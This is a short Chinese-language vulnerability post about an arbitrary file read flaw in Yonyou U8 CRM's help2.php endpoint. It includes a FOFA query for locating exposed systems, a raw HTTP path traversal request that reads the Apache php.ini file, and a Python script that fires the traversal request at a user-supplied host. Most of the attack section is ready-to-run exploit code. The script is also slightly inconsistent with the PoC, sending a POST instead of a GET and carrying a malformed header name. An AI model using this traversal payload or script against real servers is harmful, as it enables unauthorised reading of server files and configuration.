用友U8 CRM系统help2 任意文件读取漏洞（1day)

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、产品简介

《U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体，提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度，以“整合、专业、智能、畅捷”为产品研发理念，弥补了代理销售服务行业信息化管理的空白，为其经营管理的腾飞注入了强大的力量!

技术平台
采用JAVA跨平台BS应用开发技架构，支持 SQL Server数据库，支持Chrome、 Firefox等各种主流浏览器应用。

二、网络空间引擎

fofa查询

title="用友U8CRM"

三、漏洞复现

POC

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

?

部分内容如下

?四、python检测脚本

import requests

def verify(ip):

    url = f'{ip}/pub/help2.php?key=/../../apache/php.ini'

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'DNT': '1',
        'Connection': 'close',
        'Accept - Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Upgrade-Insecure-Requests': '1'
    }

    try:
        response = requests.post(url, headers=headers)
        if response.status_code == 200:
            print(f"{ip}存在用友U8 CRM系统help2任意文件读取漏洞!!!")
    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

?